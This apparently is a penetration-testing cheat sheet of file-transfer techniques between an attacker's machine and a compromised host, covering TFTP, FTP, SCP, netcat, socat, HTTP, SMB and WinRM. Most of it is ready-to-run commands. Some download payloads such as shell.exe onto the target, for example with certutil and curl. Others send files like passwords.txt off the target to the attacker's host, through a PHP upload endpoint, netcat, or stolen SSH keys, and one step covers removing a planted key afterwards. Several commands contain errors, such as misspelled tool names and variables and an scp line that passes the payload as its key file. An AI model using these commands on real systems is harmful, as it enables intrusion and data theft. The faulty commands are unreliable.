Skip to main content

File Transfer Techniques

TFTP

If the target has a TFTP client installed, Metasploit has a TFTP server you can run ad-hoc on your attack box to transfer files https://www.rapid7.com/db/modules/auxiliary/server/tftp/

Attack Box Side

# Start Metasploit Framework
sudo msfconsole

# Start a TFTP server and server files out of the /tmp/evil directory
msf6> use auxiliary/server/tftp
msf6> set OUTPUTPATH /tmp/evil
msf6> set TFTPROOT /tmp/evil
msf6> run

# Stop the TFTP server
# List jobs and find server job
msf6> jobs
# Kill TFTP server job with an ID of 1
msf6> jobs -k 1



Target Side

# Copy a file from the Attack Box to the target
# Assumes the Attack Box IP is 10.50.50.11
tftp -i 10.50.50.11 GET filename.txt C:\Windows\Temp\filename.txt

# Copy a file to the Attack Box
# Assumes the Attack Box IP is 10.50.50.11
# This will put the file in /tmp/evil
tftp -i 10.50.50.11 PUT C:\Windows\Temp\filename.txt filename.txt




FTP

Attack Box Running FTP Server

# Show help message
sudo python3 -m pyftpdlb --help

# Mount the /tmp directory read/write on Kali with anonymous login
sudo python3 -m pyftpdlib -d /tmp --write --port=21

# Mount the /tmp directory read/write with authentication
sudo pyton3 -m pyftpdlib -d /tmp -u "username" -P "password" --write --port=21



Linux Target

# Connect to Kali FTP anonymously
# Username: anonymous
# Password: [Press ENTER key]
ftp kali-ip-address

# Connect with credentials
# Username: username
# Password: password
ftp kali-ip-address



Windows Target

# Connect Anonymously
ftp -A kali-ip-address

# Connect with credentials
# Enter the username and password when prompted
ftp kali-ip-address





FTP Server on Target

# Connect to an FTP server from Kali anonymously
# Press ENTER key if prompted for password
ftp anonymous@target-ip-address

# Connect to target FTP server with credentials
ftp "ftp://username:password@target-ip-address"





SCP

The most fundamental syntax for using scp is this:

# Password Authentication 
# -----------------------
# Transfer from Local to Remote
scp [local path] [username]@[target-ip]:[remote-path]

# Transfer from Remote to Local
scp [username]@[target-ip]:[remote-path] [local-path]


# Private Key Authentication 
# --------------------------
# Transfer from Local to Remote
# Authenticate as [username] on [target-ip] using private key file
scp -i [path-to-private-key-file] [local path] [username]@[target-ip]:[remote-path]

# Transfer from Remote to Local
# Authenticate as [username] on [target-ip] using private key file
scp -i [path-to-private-key-file] [username]@[target-ip]:[remote-path] [local-path]



Linux Target Running SSH Server

From Attack Box

  • Transfer a payload from /tmp/payload on the Attack Box to /tmp/pwnz on the target


Password Authentication
scp /tmp/payload johndoe@target-ip:/tmp/pwnz


Private Key Authentication
  • You have obtained a private key for the johndoe user on the target
  • You have stored the private key file in /tmp/johndoe on the Attack Box
scp -i /path/to/privatekey /tmp/payload user@target-ip:/tmp/pwnz



To Attack Box

  • You want to transfer /home/johndoe/passwords.txt to /tmp/passwords.txt your Attack Box
  • Run these commands on Attack Box and authenticate as johndoe on the target


Password Authentication
scp user@target-ip:/home/johndoe/passwords.txt /tmp/passwords.txt


Private Key Authentication
  • You have obtained a private key for the johndoe user on the target
  • You have stored the private key file in /tmp/johndoe on the Attack Box
scp -i /tmp/johndoe user@target-ip:/home/johndoe/passwords.txt /tmp/passwords.txt



Windows Target Running SSH Server

From Attack Box

  • Transfer a payload from /tmp/payload.exe on the Attack Box to C:\Windows\Temp\ on the target
  • Run these commands on Attack Box and authenticate as johndoe on the target


Password Authentication
scp /tmp/payload.exe johndoe@target-ip:C:/Windows/Temp/


Private Key Authentication
  • You have obtained a private key for the johndoe user on the target
  • You have stored the private key file in /tmp/johndoe on the Attack Box
scp -i /tmp/payload.exe johndoe@target-ip:C:/Windows/Temp/



To Attack Box

  • You want to transfer C:\Users\JohnDoe\Desktop\passwords.txt to /tmp/passwords.txt on the Attack Box
  • Run these commands on Attack Box and authenticate as johndoe on the target


Password Authentication
scp johndoe@target-ip:C:/Users/JohnDoe/Desktop/passwords.txt /tmp/


Private Key Authentication
  • You have obtained a private key for the johndoe user on the target
  • You have stored the private key file in /tmp/johndoe on the Attack Box
scp -i /tmp/johndoe johndoe@target-ip:C:/Users/JohnDoe/Desktop/passwords.txt /tmp/


Attack Box Running SSH Server

  1. Create a junk user account on your attack box
  2. Create an SSH key pair
  3. Add the public key string to /home/junkuser/.ssh/authorized_keys
  4. Transfer the private key to the target
  5. Run one of the commands below
  6. Destroy the authentication mechanism!
    • Don't leave access to your attack box on the host
    • Do one of the following (or both):
      • Delete the private key off the target: rm -rf /path/to/privatekey
      • Delete the junkuser account from the attack box:  sudo userdel -rf junkuser



Windows Target

  • SSH private key for junkuser account on Attack Box is stored at C:\Windows\Temp\junk-key.pem


From Attack Box
  • You want to transfer a payload from /tmp/payload.exe on the Attack Box to C:\Windows\Temp\ on the target
  • You will run this command on the target to authenticate as junkuser on the Attack Box
scp -o "StrictHostKeyChecking=no" -i C:\Windows\Temp\junk-key.pem junkuser@attack-box-ip:/home/junkuser/payload.exe C:\Windows\Temp\


To Attack Box
  • You want to transfer C:\Users\JohnDoe\Desktop\passwords.txt to /home/junkuser/ on the Attack Box
  • You will run this command on the target to authenticate as junkuser on the Attack Box
scp -o "StrictHostKeyChecking=no" -i C:\Windows\Temp\junk-key-pem C:\Users\JohnDoe\passwords.txt junkuser@attack-box-ip:/home/junkuser/

Linux Target

  • SSH private key for junkuser account on Attack Box is stored at /tmp/junk-key.pem


From Attack Box
  • You want to transfer a payload from /home/junkuser/payload on the Attack Box to /tmp/ on the target
  • You will run this command on the target to authenticate as junkuser on the Attack Box
scp -o "StrictHostKeyChecking=no" -i /tmp/junk-key.pem junkuser@attack-box-ip:/home/junkuser/payload /tmp/


To Attack Box
  • You want to transfer /home/johndoe/passwords.txt to /home/junkuser/ on the Attack Box
  • You will run this command on the target to authenticate as junkuser on the Attack Box
scp -o "StrictHostKeyChecking=no" -i /tmp/junk-key-pem /home/johndoe/passwords.txt junkuser@attack-box-ip:/home/junkuser/



Netcat

Listener on Attack Box

# Start a listener on the attack box and redirect output
nc -lnvp 53 > /tmp/got-the-file

# Connect to the listener and pull in the file
nc -nv attack-box-ip 53 < /path/to/file



Listener on Target

Hint: You may also want to start the listener on the target in the background, as CTRL+C will likely kill your reverse shell.

# Start a listener on the target and pull in the file
nc -lnvp 55555 < /path/to/file

# Connect to the listener and pull in the file
nc -nv target-ip 55555 > /tmp/got-the-file





Socat

Listener on Attack Box

# Start a listener on the attack box and create a file when received
socat TCP4-LISTEN:<port>,fork file:/tmp/got-the-file,create

# Connect and transfer the file to your attack box
socat TCP4:attack-box-ip:<port> file:/path/to/file


Listener on Target

Hint: You may also want to start the listener on the target in the background, as CTRL+C will likely kill your reverse shell.

# Start a listener and host a file on the target
socat TCP4-LISTEN:<port>,fork file:/path/to/file

# Connect and receive the file on your attack box
socat TCP4:target-ip:<port> file:/tmp/got-the-file,create





Web

Apache (Upload to Attack Box)

  1. Create upload.php in /var/www/html/ on attack box
<?php
    $uploadDirectory = '/var/www/html/uploads/';
    $uploadFile = $uploadDirectory . $_FILES['file']['name'];
    move_uploaded_file($_FILES['file']['tmp_name'], $uploadFile);
?>
  1. Create an upload directory on attack box mkdir /var/www/html/uploads
  2. Change permissions sudo chown www-data:www-data /var/www/html/uploads
  3. Start Apache web server on attack boxsudo systemctl start apache2
  4. On target:
    • curl -X POST -H "Content-Type: multipart/form-data" --form file=@"/path/to/file" http://attack-box-ip/upload.php (note: you could use curl -k and https if your attack box is running HTTP over TLS to encrypt the file transfer)
    • If the target is a Windows host, you can run this PowerShell command to upload the file: [System.Net.WebClient]::new().UploadFile('http://attack-box-ip/upload.php', 'C:\Absolute\Path\To\File')
  5. Receive file on attack box
  6. Stop web server on attack box: sudo systemctl stop apache2



Python Web Server

Python 2 vs. Python 3

# Start a web server in Python 3 on TCP port 50011
python3 -m http.server 50011

# Start a web server in Python 2 on TCP port 50011
python2 -m SimpleHTTPServer 50011


Transfer from Attack Box

Example: You've got a payload in the /tmp folder on the Attack Box that you want to transfer to a target.

To Windows

# On Attack Box
cd /tmp
python3 -m http.server 80

# On Windows
# cmd.exe
certutil.exe -urlcache -split -f 'http://attack-ip/filename' 'filename'
# PowerShell
Invoke-WebRequest -Uri 'http://attack-ip/filename' -OutFile 'C:\Windows\Temp\filename'


To Linux

# On Attack Box
cd /tmp
python3 -m http.server 80

# On Linux (store in /tmp on the target)
# curl
curl http://attack-ip/filename -o /tmp/filename

# wget
wget http://attack-ip/filename -O /tmp/filename


Transfer to Attack Box

Example: There is a file on the target you want to transfer to  Kali 

From Windows

Assumes Python is installed on the Windows target

# On Windows
cd C:\Users\johndoe\Desktop
python3 -m http.server 51110

# On Attack Box (store in Downloads folder)
# curl
curl http://target-ip:51110/filename -o ~/Downloads/filename

# wget
wget http://target-ip:51110/filename -O ~/Downloads/filename


From Linux

# On Linux
cd /home/johndoe
python3 -m http.server 51110

# On Attack Box(store in Downloads folder)
# curl
curl http://target-ip:51110/filename -o ~/Downloads/filename

# wget
wget http://target-ip:51110/filename -O ~/Downloads/filename





SMB

SMB Server on Attack Box

For this, we can use Impacket's smbserver.py script to run an ad-hoc SMB server. There are two required arguments:

  • Share Name
  • Share Path

You can also configure the SMB server with:

  • Username + Password authentication
  • NTLM hash authentication
  • Specific IP binding
  • Specific port binding (TCP/445 is default)
  • And more...

Attack Box Side

# Print help message
smbserver.py -h

# Serve an anonymous SMB share called "EvilShare" from the /tmp directory on attack box
smbserver.py -smb2support EvilShare /tmp

# Serve a SMB share with password authentication
smbserver.py -smb2support -username 'secretuser' -password 'secretpass' MyShare /tmp


Windows Client

cmd.exe
# Anonymous share
# ---------------
# List files in share
dir \\attackbox-ip-address\EvilShare\
# List a specific file in a share
dir \\attackbox-ip-address\EvilShare\filename.txt
# Copy a file from the share to the target
copy \\attackbox-ip-address\EvilShare\filename.txt C:\Windows\Temp\filename.txt
# Copy a file from the target to the share
copy C:\Windows\Temp\filename.txt \\attackbox-ip-address\EvilShare\filename.txt
# Unmap the share
net use /DELETE \\attackbox-ip-address\EvilShare

# Authenticated Share
# -------------------
# Authenticate as "secretuser" with the password "secretpass"
net use /user:secretuser \\attackbox-ip-address\MyShare 'secretpass'
# List files in share
dir \\attackbox-ip-address\MyShare\
# List a specific file in a share
dir \\attackbox-ip-address\MyShare\filename.txt
# Copy a file from the share to the target
copy \\attackbox-ip-address\MyShare\filename.txt C:\Windows\Temp\filename.txt
# Copy a file from the target to the share
copy C:\Windows\Temp\filename.txt \\attackbox-ip-address\MyShare\filename.txt
# Unmap the share
net use /DELETE \\attackbox-ip-address\MyShare


powershell.exe

SmbShare Module

  • Requires PowerShell v5+ and Windows 10 or newer
  • See PSDrive cmdlets below for older clients
  • The net use commands are also an option in PowerShell
# Anonymous Share
# ---------------
# Map "EvilShare" from Attack Box
New-SmbMapping -LocalPath 'Z:' -RemotePath \\kali.cyber.range\EvilShare
# List Items in the Share
Get-ChildItem Z:\
# List a file in the share
Get-ChildItem Z:\filename.txt
# Copy an item from the share
Copy-Item Z:\filename.txt C:\Windows\Temp\filename.txt
# Copy an item to the share
Copy-Item C:\Windows\Temp\filename.txt Z:\
# Remove the share
Remove-SmbMapping -LocalPath 'Z:' -Force

# Authenticated Share
# ------------------
# Map "MyShare" from Attack Box with the username "secretuser" and the password "secretpass"
New-SmbMapping -LocalPath 'X:' -RemotePath \\kali.cyber.range\MyShare -UserName 'secretuser' -Password 'secretpass'
# List items in the share
Get-ChildItem X:\
# Copy an item from the share
Copy-Item X:\filenam.txt C:\Windows\Temp\filename.txt
# Copy an item to the sahre
Copy-Item C:\Windows\filename.txt X:\
# Remove the share
Remove-SmbMapping -LocalPath 'X:' -Force


PSDrive Cmdlets

# Anonymous Share
# ---------------
# Map "EvilShare" from Attack Box
New-PSDrive -Name 'Z' -PSPRovider FileSystem -Root \\attackbox-ip-address\EvilShare
# List Items in the Share
Get-ChildItem Z:\
# List a file in the share
Get-ChildItem Z:\filename.txt
# Copy an item from the share
Copy-Item Z:\filename.txt C:\Windows\Temp\filename.txt
# Copy an item to the share
Copy-Item C:\Windows\Temp\filename.txt Z:\
# Remove the share
Remove-PSDrive -Name 'Z'


# Authenticated Share
# ------------------
# Map "MyShare" from Attack Box with the username "secretuser" and the password "secretpass"
$username = 'secretuser'
$password = 'secretpass' | ConvertTo-SecureString -AsPlaintext -Force
$credential = New-Object PSCredential -ArgumentList $usernmae,$password
New-PSDrive -Name 'X' -PSPRovider FileSystem -Root \\attackbox-ip-address\MyShare -Credential $credential

# List items in the share
Get-ChildItem X:\
# Copy an item from the share
Copy-Item X:\filenam.txt C:\Windows\Temp\filename.txt
# Copy an item to the sahre
Copy-Item C:\Windows\filename.txt X:\
# Remove the share
Remove-PSDrive -Name 'X'



SMB Server on Target

Attack Box Side

# Anonymous Authentication
# ------------------------
# Enumerate shares
smbclient -L //target-ip-address -U '' --option="client min protocol=core"
# Map a share
smbclient //target-ip-address/ShareName smbclient -U '' --option="client min protocol=core"
# Copy a file from the target to Attack Box
smb: \> get filename.txt /tmp/filename.txt
# Copy a file to the target
smb: \> put /tmp/filename.txt filename.txt


# Authenticated Share
# -------------------
# Enumerate shares
# Local user
smbclient -L //target-ip-address -U 'username%password' --option="client min protocol=core"
# Domain user 
smbclient -L //target-ip-address -U 'DOMAIN.TLD/username%password' --option="client min protocol=core"

# Map a share
# Local user
smbclient //target-ip-address/ShareName -U 'username%password' --option="client min protocol=core"
# Domain user 
smbclient //target-ip-address/ShareName -U 'DOMAIN.TLD/username%password' --option="client min protocol=core"
# Copy a file from the target to Attack Box
smb: \> get filename.txt /tmp/filename.txt
# Copy a file to the target
smb: \> put /tmp/filename.txt filename.txt

PowerShell Remoting (WinRM)

WinRM runs on TCP port 5985 for unencrypted sessions and 5986 for encrypted sessions.

# Open a PSSession on the target host
$computerName = 'computer_name_here' # Kerberos requires a FQDN, NTLM uses IP address
$credential = Get-Credential # Username and password used to log onto the target
$psSessionParameters = @{
  ComputerName = $computerName
  Credential = $credential
  Authentication = 'Kerberos' # For NTLM use Default
}
$session = New-PSSession @psSessionParameters

# Copy a file to the remote session
# For example:
#    Copy the file shell.exe to the target
#    The target directory will be C:\Windows\Temp in this example
Copy-Item "C:\Users\evil.user\Desktop\shell.exe" "C:\Windows\Temp" -ToSession $session

# Copy a file from the remote session
# For example:
#    Copy the file flag.txt from the target
#    Back to C:\Users\evil.users\Desktop
Copy-Item "C:\Users\jane.doe\Desktop\flag.txt" "C:\Users\evil.user\Desktop" -FromSession $session